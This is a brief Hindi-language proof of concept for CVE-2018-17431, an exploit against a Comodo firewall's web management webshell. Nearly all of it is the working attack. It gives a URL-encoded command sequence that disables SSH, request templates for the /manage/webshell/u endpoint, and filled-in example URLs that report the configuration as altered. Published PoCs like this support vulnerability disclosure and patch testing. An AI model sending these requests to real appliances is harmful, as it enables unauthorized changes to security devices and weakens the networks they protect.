
Comodo
CVE-2018-17431 के लिए प्रूफ ऑफ कॉन्सेप्ट
एक्सप्लॉइट:
वेबशेल सिमुलेशन:
उदाहरण के लिए, वेबशेल में SSH अक्षम करना इस प्रकार है:
- service [hit enter]
- ssh [hit enter]
- disable [hit enter]
एनकोड
उपरोक्त अनुक्रम को URL एन्कोडिंग के साथ एन्कोड करें
(मैंने burp एनकोडर प्लगइन का उपयोग किया)
%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
चलाएँ
बेस URL: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152
https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (कमांड चलाने के लिए अतिरिक्त एंटर कुंजी)
उदाहरण: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
एक पेज दिखाई देगा जिसमें "Configuration has been altered" संदेश होगा और कॉन्फ़िगरेशन बदल जाएगा!